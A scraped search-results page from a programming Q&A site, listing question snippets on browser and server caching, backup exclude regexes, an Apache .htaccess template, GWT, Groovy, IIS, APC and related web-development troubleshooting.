Search Results

Search found 19411 results on 777 pages for 'browser cache'.

  • What files should be excluded from a complete Windows backup?

    - by tro
    I'm starting to use CrashPlan to back up my Windows 7 PC. I have it writing to my external HD (for quick local restores) and to CrashPlan Central (for offsite storage). I'd like to back up my entire C:\ drive (the only partition) in a way that preserves all of my installed software and configuration, but avoids backing up log files and other ephemeral or temporary files that are regenerated during normal operation of the OS. Which files and/or directories should I be excluding from backups? I'd like to make this a community wiki, so that we can all contribute towards a definitive list. Here is the list of regular expressions identifying the directories and files that CrashPlan excludes on Windows by default, as listed at http://support.crashplan.com/doku.php/articles/admin_excludes:

      .*/(?:42|\d{8,})/(?:cp|~).*
      (?i).*/CrashPlan.*/(?:cache|log|conf|manifest|upgrade)/.*
      .*\.part
      .*/iPhoto Library/iPod Photo Cache/.*
      .*\.cprestoretmp.*
      *\.rbf
      :/Config\\.Msi.*
      .*/Google/Chrome/.*cache.*
      .*/Mozilla/Firefox/.*cache.*
      .*\$RECYCLE\.BIN/.*
      .*/System Volume Information/.*
      .*/RECYCLER/.*
      .*/I386.*
      .*/pagefile.sys
      .*/MSOCache.*
      .*UsrClass\.dat\.LOG
      .*UsrClass\.dat
      .*/Temporary Internet Files/.*
      (?i).*/ntuser.dat.*
      .*/Local Settings/Temp.*
      .*/AppData/Local/Temp.*
      .*/AppData/Temp.*
      .*/Windows/Temp.*
      (?i).*/Microsoft.*/Windows/.*\.log
      .*/Microsoft.*/Windows/Cookies.*
      .*/Microsoft.*/RecoveryStore.*
      (?i).:/Config\\.Msi.*
      (?i).*\\.rbf
      .*/Windows/Installer.*

    Other excludes:

      .*\.(class|obj)
      .*/hiberfil.sys
      (?i).*\.tmp
      (?i).*/temp/
      (?i).*/tmp/
      .*Thumbs\.db
      .*/Local Settings/History/
      .*/NetHood/
      .*/PrintHood/
      .*/Cookies/
      .*/Recent/
      .*/SendTo/
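    If you want to reuse CrashPlan's patterns elsewhere, for example to test whether a given path would be skipped, here is a minimal Python sketch that applies a few of the regexes above to Windows paths. The pattern subset, helper name and sample paths are illustrative assumptions, not part of CrashPlan itself.

    ```python
    import re

    # A small, hypothetical sample of the default Windows exclude patterns listed
    # above; paths are normalized to forward slashes before matching.
    EXCLUDES = [
        r".*/pagefile.sys",
        r".*/AppData/Local/Temp.*",
        r"(?i).*\.tmp",
        r".*/System Volume Information/.*",
        r".*Thumbs\.db",
    ]
    COMPILED = [re.compile(p) for p in EXCLUDES]

    def is_excluded(path: str) -> bool:
        """Return True if the path matches any of the exclude patterns."""
        normalized = path.replace("\\", "/")
        return any(rx.match(normalized) for rx in COMPILED)

    if __name__ == "__main__":
        for p in [r"C:\pagefile.sys",
                  r"C:\Users\tro\AppData\Local\Temp\setup.log",
                  r"C:\Users\tro\Documents\report.docx"]:
            print(p, "->", "exclude" if is_excluded(p) else "keep")
    ```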

    Read the article

  • Apple iOS Apps and caching at the edge proxy

    - by Matthew Iselin
    Our network contains a growing number of iOS devices, all with very similar configurations. All Internet access is via a transparent proxy. We've found that iOS updates and some free apps cache fine on the proxy, but any paid apps fail to cache properly (they seem to be encrypted to the Apple ID?). I'm wondering if there's any way forward where we could cache the paid apps, so that they are purchased n times but downloaded from the proxy cache instead of from the Internet each time. Bandwidth caps aside, downloading directly from the Internet slows everything down for everyone, regardless of fairness queueing and related 'fixes'. I know this is quite unlikely, but I figured there's nothing to lose and everything to gain before I look into other solutions (e.g. QoS).
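    Not an answer, but it may help to measure the problem before reaching for QoS: if the transparent proxy is Squid (or anything that writes a similar access log), a short script can tally cache hits versus misses for Apple download traffic. The log path, field layout and host patterns below are assumptions for illustration only.

    ```python
    import collections
    import re

    LOG = "/var/log/squid/access.log"        # assumed log location (Squid native format)
    APPLE = re.compile(r"(apple\.com|mzstatic\.com|itunes)", re.I)

    counts = collections.Counter()
    with open(LOG) as fh:
        for line in fh:
            fields = line.split()
            # In the native format, field 4 is e.g. TCP_HIT/200 and field 7 is the URL.
            if len(fields) < 7 or not APPLE.search(fields[6]):
                continue
            counts[fields[3].split("/")[0]] += 1

    for result, n in counts.most_common():
        print(f"{result}: {n}")
    ```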

    Read the article

  • Strange groovy behavior when dealing with threads

    - by Misha Koshelev
    Dear all: I have an interesting dilemma. If I define my class as:

      class Browser {
          def swtException
          protected Object evaluate(script) throws SWTException {
              swtException = null
              display.syncExec() {
                  try {
                      result = swtBrowser.evaluate(script)
                  } catch (SWTException swtException) {
                      Browser.swtException = swtException
                  }
              }
          }
      }

    I get this rather interesting error:

      Exception in thread "Thread-5" org.eclipse.swt.SWTException: Failed to execute runnable
      (groovy.lang.MissingPropertyException: No such property: swtException for class:
      com.mksoft.fbautomate.browser.Browser Possible solutions: swtException)

    Any ideas? Thank you! Misha

    Read the article

  • I want some cross-browser consistency on my fieldsets, do you know how I can do it?

    - by Omar
    I have this problem with fieldsets... have a look at http://i.imgur.com/IRrXB.png. Is it possible to achieve what I want with CSS? Believe me, I tried! As you can see in the image, I just want the look of the legend to be consistent across browsers: it should use the width of the fieldset, no more (like Chrome and IE) and no less (like Firefox). Don't worry about the rounded corners and other issues, that's taken care of. Here's the code I'm using.

    CSS

      <style type="text/css">
      fieldset {margin: 0 0 10px 0; padding: 0; border: 1px solid silver; background-color: #f9f9f9; -moz-border-radius: 5px; -webkit-border-radius: 5px; border-radius: 5px}
      fieldset p {clear: both; margin: .3em 0; overflow: hidden;}
      fieldset label {float: left; width: 140px; display: block; text-align: right; padding-right: 8px; margin-right: 2px; color: #4a4a4a;}
      fieldset input, fieldset textarea {margin: 0; border: 1px solid #ddd; padding: 3px 5px 3px 5px;}
      fieldset legend { background: #C6D1E8; position: relative; left: -1px; margin: 0; width: 100%; padding: 0px 5px; font-size: 1.11em; font-weight: bold; text-align: left; border: 1px solid silver; -webkit-border-top-left-radius: 5px; -webkit-border-top-right-radius: 5px; -moz-border-radius-topleft: 5px; -moz-border-radius-topright: 3px; border-top-left-radius: 5px; border-top-right-radius: 5px; }
      #md {width: 400px;}
      </style>

    HTML

      <div id="md">
        <fieldset>
          <legend>some title</legend>
          <p>
            <label>Login</label> <input type="text" />
          </p>
          <p>
            <label>Password</label> <input type="text" />
          </p>
          <p>
            <label>&nbsp;</label> <input type="submit">
          </p>
        </fieldset>
      </div>

    Read the article

  • Why has Javascript been (mostly) only a browser-side technology for more than 10 years?

    - by Gabriel Cuvillier
    Recently there have been a lot of projects pushing JavaScript in other directions: as a general-purpose scripting language (GLUEScript, Rhino), as an extension language (QTScript, Adobe Reader, OO macros), for widgets (Yahoo Widgets, MS Gadgets, Dashboard), and even for server-side JS and web frameworks (CommonJS, Helma, Phobos, V8cgi), which seems obvious since it is already a language widely used for web development. But everything is so new and nothing is really mature. Yet JS has been around for almost 15 years, is as powerful as any other scripting language, is standardized by ECMA, and is a mandatory technology for web development. Why did it take so much time to gain acceptance in domains other than web browsers?

    Read the article

  • Prevent users from being able to access a webpage via web browser?

    - by Rob
    My friend and I are working on a program. This program is going to submit GET data to our webpage. However, we don't want users accessing the webpage any way other than through the program. We can prevent users from sharing the program using HWID authentication, but nothing prevents them from using a packet scanner to get the URL of the webpage. We thought about user-agent authentication, which we will implement, but user-agents can easily be spoofed. So my question is: how can we prevent users from accessing the webpage directly, rather than through the program? Even if you don't have an answer that will completely work, anything that will help deter them would be nice. Currently we will be implementing:

      HWID authentication to use the program
      User-Agent authentication to access the web page
      Instant IP blacklisting of anyone accessing the webpage without the proper User-Agent
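    As the asker notes, a User-Agent check is only a deterrent, but here is a minimal sketch of the last two items on that list (User-Agent gating plus instant IP blacklisting) using only the Python standard library. The expected User-Agent string, port and in-memory blacklist are hypothetical placeholders, not details from the actual program.

    ```python
    from http.server import BaseHTTPRequestHandler, HTTPServer

    EXPECTED_UA = "MyProgram/1.0"   # assumed custom User-Agent sent by the program
    blacklist = set()               # in-memory blacklist; real code would persist this

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            ip = self.client_address[0]
            if ip in blacklist or self.headers.get("User-Agent") != EXPECTED_UA:
                blacklist.add(ip)           # instant blacklist on a bad User-Agent
                self.send_error(403, "Forbidden")
                return
            self.send_response(200)
            self.send_header("Content-Type", "text/plain")
            self.end_headers()
            self.wfile.write(b"OK")         # normal response for the program

    if __name__ == "__main__":
        HTTPServer(("0.0.0.0", 8080), Handler).serve_forever()
    ```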

    Read the article

  • Is it possible to get code coverage data for a GWT web app running tests from the web browser?

    - by jeff
    I am not sure if this is possible, but I would like some way to get code coverage information for tests that are written in QuickTest for our GWT-based web app. It does not seem like there is any solution, because the QuickTest Pro tests run against the compiled GWT app and not the original Java code in which the app was written. I suppose I could get coverage data on the JavaScript that the GWT compiler creates, but there would be no way for me (that I know of) to map this information back to the original Java code. Is there some way to do this?

    Read the article

  • JavaScript: how to automatically change a word on click without needing to refresh the browser?

    - by Fakhrul Zakry
    I'm quite lost here and not really an expert in JavaScript. I want the content to change to "Thanks for your vote" automatically when the user clicks, without needing to refresh the page. Here is my HTML:

      {% if poll.privacy == "own" and request.user.get_profile.parliment != poll.location %}
        You do not have permission to vote this.
      {% else %}
        {% if has_vote %}
          {% if poll.rating_option == '1to5' %}
            <div class="rate"> <div id="poll-rate-{{ poll.pk }}"></div> </div>
          {% else %}
            Thanks for your vote.
          {% endif %}
        {% else %}
          {% if poll.rating_option == 'yes_no' %}
            <a href="javascript:void(0)" class="rate btn btn-xs btn-success mr5 vote-positive" rel="{% url 'vote_vote' poll.pk 1 %}" alt="{{ poll.pk }}">Yes</a>
            <a href="javascript:void(0)" class="rate btn btn-xs btn-danger vote-negative" rel="{% url 'vote_vote' poll.pk 0 %}" alt="{{ poll.pk }}">No</a>
          {% elif poll.rating_option == 'like_dislike' %}
            <a href="javascript:void(0)" class="rate btn btn-xs btn-success mr5 vote-positive" rel="{% url 'vote_vote' poll.pk 1 %}" alt="{{ poll.pk }}">Like</a>
            <a href="javascript:void(0)" class="rate btn btn-xs btn-danger vote-negative" rel="{% url 'vote_vote' poll.pk 0 %}" alt="{{ poll.pk }}">Dislike</a>
          {% elif poll.rating_option == '1to5' %}
            <div class="rate"> <div id="poll-rate-{{ poll.pk }}"></div> </div>
          {% endif %}
        {% endif %}
      {% endif %}

    and here is my JavaScript:

      function bindVoteHandler() {
          $('a.vote-positive, a.vote-negative').click(function(event) {
              event.preventDefault();
              var link = $(this).attr('rel');
              var poll_pk = $(this).attr('alt');
              var selected_div = $(this).parent('div');
              selected_div.html('<img src="{{ STATIC_URL }}img/loading_small.gif" />');
              $.ajax(link).done(function( data ) {
                  var result_div = $('div#vote-result-'+poll_pk);
                  result_div.html(data);
                  result_div.removeClass('vote-result-grey-out');
                  selected_div.html('<small>Thanks for your vote.</small>');
              });
          });
      };

    Does anyone know why I need to refresh my page after I Like/vote/rate before it shows "Thanks for your vote"? It is supposed to appear automatically when I click Like. The images (not shown here) illustrate the state before clicking Like and after clicking Like; only after refreshing does the text appear. Please help or share a link with me. Thank you in advance.
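    Since the template's vote links point at a Django URL named 'vote_vote', one thing worth checking is what that view returns to the $.ajax(...).done() callback above: the callback expects an HTML fragment it can drop into div#vote-result-<pk>. The following is only a hypothetical sketch of such a view; the view name comes from the template, but its arguments, body and vote-recording logic are assumptions.

    ```python
    from django.http import HttpResponse

    def vote_vote(request, poll_pk, value):
        # Record the vote for poll `poll_pk` with `value` here (omitted), then
        # return the fragment the AJAX handler inserts into the result <div>.
        return HttpResponse('<small>Thanks for your vote.</small>')
    ```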

    Read the article

  • .htaccess template, suggestions needed

    - by purpler
    # Defaults AddDefaultCharset UTF-8 DefaultLanguage en-US FileETag None Header unset ETag ServerSignature Off SetEnv TZ Europe/Belgrade # Rewrites Options +FollowSymLinks RewriteEngine On RewriteBase / # Redirect to WWW RewriteCond %{HTTP_HOST} ^serpentineseo.com RewriteRule (.*) http://www.serpentineseo.com/$1 [R=301,L] # Redirect index to root RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*index\.html\ HTTP/ RewriteRule ^(.*)index\.html$ /$1 [R=301,L] # Cache media files: ExpiresActive On ExpiresDefault A0 # Month <filesMatch "\.(gif|jpg|jpeg|png|ico|swf|js)$"> Header set Cache-Control "max-age=2592000, public" </filesMatch> # Week <FilesMatch "\.(css|pdf)$"> Header set Cache-Control "max-age=604800" </FilesMatch> # 10 Min <FilesMatch "\.(html|htm|txt)$"> Header set Cache-Control "max-age=600" </FilesMatch> # Do not cache <FilesMatch "\.(pl|php|cgi|spl|scgi|fcgi)$"> Header unset Cache-Control </FilesMatch> # Compress output <IfModule mod_deflate.c> <FilesMatch "\.(html|js|css)$"> SetOutputFilter DEFLATE </FilesMatch> </IfModule> # Error Documents ErrorDocument 206 /error/206.html ErrorDocument 401 /error/401.html ErrorDocument 403 /error/403.html ErrorDocument 404 /error/404.html ErrorDocument 500 /error/500.html # Prevent hotlinking RewriteCond %{HTTP_REFERER} !^$ RewriteCond %{HTTP_REFERER} !^http://(www\.)?serpentineseo.com/.*$ [NC] RewriteRule \.(gif|jpg|png)$ http://www.serpentineseo.com/images/angryman.png [R,L] # Prevent offline browsers RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR] RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:[email protected] [OR] RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR] RewriteCond %{HTTP_USER_AGENT} ^Custo [OR] RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR] RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR] RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR] RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR] RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR] RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR] RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR] RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR] RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR] RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR] RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR] RewriteCond %{HTTP_USER_AGENT} ^GetWeb! 
[OR] RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR] RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR] RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR] RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR] RewriteCond %{HTTP_USER_AGENT} ^HMView [OR] RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR] RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR] RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR] RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR] RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR] RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR] RewriteCond %{HTTP_USER_AGENT} ^larbin [OR] RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR] RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR] RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR] RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR] RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR] RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR] RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR] RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR] RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR] RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR] RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR] RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR] RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR] RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR] RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR] RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR] RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR] RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR] RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR] RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR] RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR] RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR] RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR] RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR] RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR] RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR] RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR] RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR] RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR] RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR] RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR] RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR] RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR] RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR] RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR] RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR] RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR] RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR] RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR] RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR] RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR] RewriteCond %{HTTP_USER_AGENT} ^Wget [OR] RewriteCond %{HTTP_USER_AGENT} ^Widow [OR] RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR] RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR] RewriteCond %{HTTP_USER_AGENT} ^Zeus RewriteRule ^.*$ http://www.google.com [R,L] # Protect against DOS attacks by limiting file upload size LimitRequestBody 10240000 # Deny access to sensitive files <FilesMatch "\.(htaccess|psd|log)$"> Order Allow,Deny Deny from all </FilesMatch>
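    One quick way to sanity-check the caching section after deploying rules like these: request a few representative files and print the Cache-Control header each one comes back with. A minimal sketch using only the Python standard library; the file names are placeholders for whatever the site actually serves.

    ```python
    import urllib.request

    URLS = [
        "http://www.serpentineseo.com/images/logo.png",  # expect max-age=2592000, public
        "http://www.serpentineseo.com/css/style.css",    # expect max-age=604800
        "http://www.serpentineseo.com/index.html",       # expect max-age=600 (after the redirect to /)
    ]

    for url in URLS:
        req = urllib.request.Request(url, method="HEAD")
        with urllib.request.urlopen(req) as resp:
            print(resp.url, "->", resp.headers.get("Cache-Control"))
    ```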

    Read the article

  • WinForms: Why do I get InvalidCastException when showing folder browser dialog?

    - by Marek
    I am randomly getting an InvalidCastException when showing a FolderBrowserDialog, and many clients have reported this too. I have not been able to find anything relevant on the internet. Does anyone know what causes this or how to fix it? My code:

      using (FolderBrowserDialog fbd = new FolderBrowserDialog())
      {
          fbd.ShowNewFolderButton = false;
          if (fbd.ShowDialog() == DialogResult.OK)

    Stack trace:

      Error: System.InvalidCastException: 'Unable to cast object of type 'System.__ComObject' to type 'IMalloc'.'.
      Stack trace:
      at System.Windows.Forms.UnsafeNativeMethods.Shell32.SHGetMalloc(IMalloc[] ppMalloc)
      at System.Windows.Forms.FolderBrowserDialog.GetSHMalloc()
      at System.Windows.Forms.FolderBrowserDialog.RunDialog(IntPtr hWndOwner)
      at System.Windows.Forms.CommonDialog.ShowDialog(IWin32Window owner)
      at System.Windows.Forms.CommonDialog.ShowDialog()

    EDIT: Additional information: I have been able to reproduce this only when running in the VS2008 debugger. When running outside the debugger, it happens only very rarely (once or twice in 6 months) on my 64-bit Windows 7 and goes away after a restart. The clients are certainly not running the app in the debugger, so it is definitely reproducible outside the debugger.

    Read the article

  • APC Not Enabled (WHM on CentOS)

    - by gamerzfuse
    I know this question has been beaten to death, but I've read almost all the responses and they haven't solved my issue. I installed APC (no errors noted), I enabled it in php.ini, and I made sure I am running PHP in FastCGI with suEXEC turned off. Still no luck.

    PHP / suEXEC Configuration
      Default PHP Version (.php files): 5
      PHP 5 Handler: fcgi
      PHP 4 Handler: none
      Apache suEXEC: off
      Apache Ruid2: off

    php.ini Configuration
      Alternative PHP Cache: apc.enabled
      Alternative PHP Cache: apc.shm_segments
      Alternative PHP Cache: apc.shm_size

    When I run the APC.php file I get this message: "No cache info available. APC does not appear to be running."

    Read the article

  • How to change the link URL shown on the web browser's status bar?

    - by sunglim
    I have already read many articles about this issue here on SO. I just want to discuss how to do it, NOT the moral issue. For example, on the Google search page: before I click a link, the link does not show the Google URL, but after I click the link with the Shift key held down, the URL on the status bar changes. This means the Google page shows a 'fake URL'. The compressed Google script is too difficult to read and analyze.
    Edit: The second URL should work on IE8 even if I click with the Ctrl key.

    Read the article

  • Cross-browser problem highlighting an option item as bold in the form element "select"

    - by Vivek
    Hello all, I am facing one weird cross-browser problem: I want to highlight some of the option items as bold by using a CSS class in my form element "select". This works fine in Firefox only, and not in other browsers like Safari, Chrome and IE. Given below is the code.

      <html>
      <head>
        <title>MAke Heading Bold</title>
        <style type="text/css">
          .mycss {font-weight:bold;}
        </style>
      </head>
      <body>
        <form name="myform">
          <select name="myselect">
            <option value="one">one</option>
            <option value="two" class="mycss">two</option>
            <option value="three" >Three </option>
          </select>
        </form>
      </body>
      </html>

    Please suggest the best possible solution for this. Thanks, Vivek

    Read the article

  • Unable to install anything on Ubuntu 9.10 with aptitude

    - by Srisa
    Hello. Earlier I could install software by using the 'sudo aptitude install' command. Today, when I tried to install rkhunter, I got errors. It is not just rkhunter; I am not able to install anything. Here is the text output:

      user@server:~$ sudo aptitude install rkhunter
      ................
      ................
      20% [3 rkhunter 947/271kB 0%]
      Get:4 http://archive.ubuntu.com karmic/universe unhide 20080519-4 [832kB]
      40% [4 unhide 2955/832kB 0%]
      100% [Working] Fetched 1394kB in 1s (825kB/s)
      Preconfiguring packages ...
      Selecting previously deselected package lsof.
      (Reading database ...
      ................
      (Reading database ... 95%
      (Reading database ... 100%
      (Reading database ... 20076 files and directories currently installed.)
      Unpacking lsof (from .../lsof_4.81.dfsg.1-1_amd64.deb) ...
      dpkg: error processing /var/cache/apt/archives/lsof_4.81.dfsg.1-1_amd64.deb (--unpack):
      unable to create `/usr/bin/lsof.dpkg-new' (while processing `./usr/bin/lsof'): Permission denied
      dpkg-deb: subprocess paste killed by signal (Broken pipe)
      Selecting previously deselected package libmd5-perl.
      Unpacking libmd5-perl (from .../libmd5-perl_2.03-1_all.deb) ...
      Selecting previously deselected package rkhunter.
      Unpacking rkhunter (from .../rkhunter_1.3.4-5_all.deb) ...
      dpkg: error processing /var/cache/apt/archives/rkhunter_1.3.4-5_all.deb (--unpack):
      unable to create `/usr/bin/rkhunter.dpkg-new' (while processing `./usr/bin/rkhunter'): Permission denied
      dpkg-deb: subprocess paste killed by signal (Broken pipe)
      Selecting previously deselected package unhide.
      Unpacking unhide (from .../unhide_20080519-4_amd64.deb) ...
      dpkg: error processing /var/cache/apt/archives/unhide_20080519-4_amd64.deb (--unpack):
      unable to create `/usr/sbin/unhide-posix.dpkg-new' (while processing `./usr/sbin/unhide-posix'): Permission denied
      dpkg-deb: subprocess paste killed by signal (Broken pipe)
      Processing triggers for man-db ...
      Errors were encountered while processing:
      /var/cache/apt/archives/lsof_4.81.dfsg.1-1_amd64.deb
      /var/cache/apt/archives/rkhunter_1.3.4-5_all.deb
      /var/cache/apt/archives/unhide_20080519-4_amd64.deb
      E: Sub-process /usr/bin/dpkg returned an error code (1)
      A package failed to install. Trying to recover:
      Setting up libmd5-perl (2.03-1) ...
      Building dependency tree... 0%
      Building dependency tree... 50%
      Building dependency tree... 50%
      Building dependency tree
      Reading state information... 0%
      ...........
      ....................

    I have removed some lines to reduce the text, but all the error messages are in here. My experience with Linux is limited and I am not sure what the problem is or how it can be resolved. Thanks.

    Read the article

  • Disable static content caching in IIS 7

    - by Lee Richardson
    I'm a developer having what should be a relatively simple problem in IIS 7 on Windows Server 2008 R2. The problem is that IIS 7 is overzealously caching all static content on the server. It caches all .html and .js content and does not notice when the content changes on disk unless I run iisreset. I've tried the following:

      Deleting the local cache in my browser (I'm 99% positive this is a server caching issue)
      In IIS Admin, under Output Caching, adding an .html extension and unchecking "User-mode caching" and "Kernel-mode caching"
      In IIS Admin, under Output Caching, adding an .html extension, checking "User-mode caching" and selecting the radio button for "Prevent all caching"
      In IIS Admin, editing the Output Cache feature settings and unchecking "Enable cache" and "Enable kernel cache"
      Running "C:\Windows\System32\inetsrv\config\appcmd set config "SharePoint - 80" -section: system.webServer/caching -enabled:false"
      Looking through applicationHost.config and disabling anything related to caching I could find.

    Nothing seems to work. I'm getting very frustrated. Can anyone please help?
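    While troubleshooting, it can help to prove whether the stale copy comes from the browser or from IIS itself. A hedged sketch: fetch a static file from outside any browser, note its hash and Last-Modified, edit the file on disk, then fetch again. The URL is a placeholder for a real page on the server.

    ```python
    import hashlib
    import urllib.request

    URL = "http://devserver/site/page.html"  # assumed test URL

    req = urllib.request.Request(URL, headers={"Cache-Control": "no-cache"})
    with urllib.request.urlopen(req) as resp:
        body = resp.read()
        print("MD5:", hashlib.md5(body).hexdigest())
        print("Last-Modified:", resp.headers.get("Last-Modified"))
    # Run once, edit the .html file on disk, then run again: if the hash and
    # Last-Modified do not change, the stale copy is being served by IIS,
    # not by a browser cache.
    ```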

    Read the article

  • What is the difference between these Pentium Extreme Edition CPUs?

    - by Giffyguy
    The CPU in question is the Pentium Extreme Edition 955. Intel's website shows four "versions", but for the most part they all look identical. They even share the same set of ordering codes. But one of them has a substantially lower TDP, which seems inexplicable, since everything else is the same. Two of them say "LGA775, Tray" and I have no idea what "Tray" means either. Also, two of them have a different SPEC code. What I need to know is:

      What does "LGA775, Tray" mean?
      Why does the one CPU have a lower TDP, and what does that mean for me? Does it mean lower maximum power consumption? Does it mean the CPU may be more stable/durable because of a lower heat output?
      Why do two of them have a different SPEC code, and what does this mean?
      Finally, what does PLGA775 (as opposed to LGA775) mean, and do I need to be worried about that?

    Information from Intel's website (all four are the Pentium Processor Extreme Edition 955, 4M Cache, 3.46 GHz, 1066 MHz FSB, PLGA775, stepping B1):

      1. Boxed, LGA775, 95 Watts, order code BX80553955, SPEC code SL94N
      2. LGA775, Tray, 130 Watts, order code HH80553PH0994M, SPEC code SL94N
      3. Boxed, LGA775, 130 Watts, order code BX80553955, SPEC code SL8WM
      4. LGA775, Tray, 130 Watts, order code HH80553PH0994M, SPEC code SL8WM

    Read the article

  • With a browser, how do I know which decimal separator the client uses?

    - by Quassnoi
    I'm developing a web application. I need to display some decimal data correctly so that it can be copied and pasted into a certain GUI application that is not under my control. The GUI application is locale-sensitive and accepts only the decimal separator that is set in the system. I can guess the decimal separator from Accept-Language, and the guess will be correct in 95% of cases, but sometimes it fails. Is there any way to do it on the server side (preferably, so that I can collect statistics), or on the client side?
    Update: The whole point of the task is doing it automatically. In fact, this web app is a kind of online interface to a legacy GUI which helps users fill in the forms correctly. The kind of users who use it mostly have no idea what a decimal separator is. The Accept-Language solution is implemented and works, but I'd like to improve it.
    Update 2: I need to retrieve a very specific setting: the decimal separator set in Control Panel / Regional and Language Options / Regional Options / Customize. I deal with four kinds of operating systems:

      Russian Windows with a comma as the DS (80%)
      English Windows with a period as the DS (15%)
      Russian Windows with a period as the DS, to make poorly written English applications work (4%)
      English Windows with a comma as the DS, to make poorly written Russian applications work (1%)

    All 100% of the clients are in Russia and the legacy application deals with Russian government-issued forms, so asking for a country will yield 100% Russian Federation, and GeoIP will yield 80% Russian Federation and 20% other, incorrect answers.
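    For the Accept-Language guess that is already implemented, here is a minimal Python sketch that looks the separator up in the server's locale database instead of a hand-written table. This only refines the existing guess; it cannot see the Control Panel override described in Update 2, and which locales are installed on the server (and their exact names, e.g. "ru_RU" vs "ru_RU.UTF-8") is an assumption.

    ```python
    import locale

    def decimal_separator(accept_language: str) -> str:
        """Best-effort decimal separator for the first Accept-Language entry."""
        lang = accept_language.split(",")[0].split(";")[0].strip()  # e.g. "ru-RU"
        try:
            locale.setlocale(locale.LC_NUMERIC, lang.replace("-", "_"))
        except locale.Error:
            return "."  # fall back when that locale is not installed on the server
        try:
            return locale.localeconv()["decimal_point"]
        finally:
            locale.setlocale(locale.LC_NUMERIC, "C")  # restore the default

    print(decimal_separator("ru-RU,ru;q=0.9,en-US;q=0.8"))  # ',' if ru_RU is available
    ```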

    Read the article

  • Is there a client-side way to prevent an image from being cached?

    - by morgancodes
    Is it possible to control with JavaScript whether a browser goes to the server for an image or to the browser cache? Can I force the browser to make a server call when it would otherwise use a cached image? I know I can simply append a query string to my image URL, but, if I understand correctly, that works because the browser sees it as a new image. I want the old image to be replaced in the cache.

    Read the article

  • Do sockets opened with fsockopen stay open after you leave the page via your browser?

    - by Rob
